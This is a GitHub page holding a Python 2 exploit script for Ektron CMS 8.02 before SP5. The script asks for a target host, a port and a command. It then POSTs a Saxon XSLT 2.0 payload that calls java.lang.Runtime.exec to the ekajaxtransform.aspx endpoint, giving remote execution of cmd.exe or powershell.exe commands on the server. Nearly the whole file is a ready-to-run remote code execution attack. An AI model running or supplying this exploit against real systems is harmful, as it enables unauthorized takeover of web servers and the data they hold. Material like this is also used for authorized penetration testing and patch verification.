EktronCMS_Exploit/ektron_saxon_exploit.py at master · HunnicCyber/EktronCMS_Exploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
############################################################################################
###     Exploit for Ektron CMS 8.02 Before SP5. This exploit takes advantage of the      ###
###     inbuilt Saxon XSLT 2.0 processor and executes a command on the remote host       ###
###     through Java embedded extension code as opposed to C# scripting through          ###
###     Microsoft's XSLT engine.                                                         ###
###                                                                                      ###
###     This is particularly useful for when Microsoft's EnableScript is set to False.   ###
###                                                                                      ###
###                 Author : Tom Kallo (Hunnic Cyber Limited)                            ###
############################################################################################
#! /usr/bin/python
import httplib

target = raw_input("""Enter the domain or IP address of target:
e.g. www.google.com, or 198.162.0.1:  """)
port = raw_input("""Enter port number of target
e.g. 80 or 443:  """)
process = raw_input("""Enter the process you wish to run:
powershell.exe or cmd.exe:  """)
command = raw_input("""Enter command you wish to run:
e.g. ping 127.0.0.1:  """)


def printText(txt):
    lines = txt.split('\n')
    for line in lines:
        print line.strip()

httpServ = httplib.HTTPConnection( target, port)
httpServ.connect()

payload = """
xslt=<?xml version="1.0"?>
<xsl:stylesheet version="2.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:java="http://saxon.sf.net/java-type">
<xsl:template match="/">
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'%s /C %s')"
xmlns:Runtime="java:java.lang.Runtime"/>
</xsl:template>
</xsl:stylesheet>""" % (process,command)

headers = {"Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "application/x-www-form-urlencoded; charset=UTF-8"}

httpServ.request('POST', '/WorkArea/ContentDesigner/ekajaxtransform.aspx', payload, headers)

response = httpServ.getresponse()
if response.status == httplib.OK:
    print "Java Process Id: "
    printText (response.read())

httpServ.close()